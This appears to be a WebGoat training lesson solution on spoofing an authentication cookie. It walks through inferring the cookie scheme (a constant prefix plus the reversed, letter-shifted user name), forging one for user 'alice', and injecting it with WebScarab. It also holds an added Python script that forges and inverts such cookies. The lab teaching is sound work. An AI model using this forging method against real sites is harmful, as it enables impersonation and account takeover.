Lesson Plan Title: How to Spoof an Authentication Cookie

 

Concept / Topic To Teach:

Many applications automatically log a user in if the right authentication cookie is presented with the request. Sometimes the cookie value can be guessed if the algorithm that generates it can be obtained, or inferred from a few sample values. Sometimes the cookies are left on the client machine and can be stolen by exploiting another vulnerability on that system. Sometimes the cookies can be intercepted using cross-site scripting. This lesson makes the student aware of authentication cookies and presents a way to defeat the cookie authentication method used in this lesson.

General Goal(s):

The user should be able to bypass the authentication check.

 

Solution:

 

Make sure that you have "Show Cookies" enabled in WebGoat, and disable the feature "Inject known cookies into requests" in WebScarab; otherwise WebScarab will keep injecting the AuthCookie it recorded earlier and overwrite the new value you add.

 

Figure 1 Disable "Inject known cookies into requests"

 

Figure 2 Logon with webgoat/webgoat

 

You can log in with webgoat/webgoat.

 

Figure 3 Logged on as webgoat

 

Hit "Refresh". The refreshed request shows our AuthCookie, and from now on you are authenticated by this cookie rather than by the user name and password parameters submitted above.

There is a new cookie called AuthCookie with the value 65432ubphcfx. Log out and log in with aspect/aspect.

 

Figure 4 Logon as aspect/aspect

 

Figure 5 Logged on as aspect

 

Hit "Refresh" to see the new cookie.

 

Figure 6 Cookie for user aspect

 

You now have a different cookie value for AuthCookie: 65432udfqtb

Both values share the constant prefix 65432; only the suffix changes with the user name:

User name    Cookie suffix
webgoat      ubphcfx
aspect       udfqtb

The suffix is derived from the user name by two trivial steps. First the user name is reversed (a transposition: webgoat becomes taogbew). Then each letter is replaced with its successor in the alphabet, a shift of one position: t->u, a->b, o->p, g->h, b->c, e->f, w->x gives ubphcfx. So for user name alice the reversed name is ecila, and shifting each letter gives fdjmb; the cookie will contain 65432fdjmb. The prefix carries no per-user secret, so anyone who knows a valid user name can compute that user's cookie.

 

Log in with user name alice and intercept the request in WebScarab. In the Cookie header, add AuthCookie=65432fdjmb next to the existing JSESSIONID cookie. The server accepts the forged AuthCookie and logs you in as alice.
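The derivation above, as an added worked example that is not part of the original solution and not WebGoat's own code: a small Python model of the inferred scheme that reproduces both observed cookies, forges one for any other user name, inverts a captured cookie back to its user name, and builds the Cookie header value to paste into the intercepted request. The names PREFIX, OBSERVED, forge_cookie, recover_username, hypothesis_holds and cookie_header are mine, and the observed pairs are the two from this walkthrough (applying the stated rule to aspect gives udfqtb: t->u, c->d, e->f, p->q, s->t, a->b). Wrapping z to a is an assumption, since the lesson never shows a z.

```python
"""Model of the AuthCookie scheme inferred in the lesson: reverse the user
name, shift every letter one place forward in the alphabet, and prepend the
constant prefix 65432. Added example; not WebGoat's own implementation."""

import string

PREFIX = "65432"              # constant part seen in both observed cookies
ALPHABET = string.ascii_lowercase

# Observed (user name -> cookie) pairs from the walkthrough.
OBSERVED = {
    "webgoat": "65432ubphcfx",
    "aspect": "65432udfqtb",
}


def _shift(text: str, offset: int) -> str:
    """Shift each lowercase letter by `offset` positions in the alphabet.
    Wrapping (z->a on encode, a->z on decode) is an assumption: the lesson
    never shows a user name containing z."""
    out = []
    for c in text:
        if c not in ALPHABET:
            raise ValueError(f"unsupported character {c!r}: only a-z modelled")
        out.append(ALPHABET[(ALPHABET.index(c) + offset) % 26])
    return "".join(out)


def forge_cookie(username: str) -> str:
    """Compute the AuthCookie value the server would issue for `username`."""
    return PREFIX + _shift(username[::-1], 1)


def recover_username(cookie: str) -> str:
    """Invert the scheme: strip the prefix, undo the shift, un-reverse."""
    if not cookie.startswith(PREFIX):
        raise ValueError("cookie does not carry the expected constant prefix")
    return _shift(cookie[len(PREFIX):], -1)[::-1]


def hypothesis_holds(samples=OBSERVED) -> bool:
    """Confirm the inferred algorithm reproduces every observed cookie
    before trusting it to forge new ones."""
    return all(forge_cookie(user) == cookie for user, cookie in samples.items())


def cookie_header(jsessionid: str, username: str) -> str:
    """Build the Cookie header value for the intercepted request: keep the
    existing session cookie and add the forged AuthCookie beside it."""
    return f"JSESSIONID={jsessionid}; AuthCookie={forge_cookie(username)}"


if __name__ == "__main__":
    # Only forge once the model explains every sample we captured.
    if not hypothesis_holds():
        raise SystemExit("inferred algorithm does not match observed cookies")
    print("forged cookie for alice:", forge_cookie("alice"))        # 65432fdjmb
    print("user behind 65432ubphcfx:", recover_username("65432ubphcfx"))
    print("Cookie:", cookie_header("<session id from WebScarab>", "alice"))
```

Capturing two or three cookies for known user names, checking that a candidate rule reproduces all of them, and only then forging is the general method; the same script structure applies to any cookie whose value is a deterministic function of the user name without a server-side secret.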


Figure 7 Add AuthCookie to request

 

Figure 8 Lesson 11 Completed


Solution by Erwin Geirnaert ZION SECURITY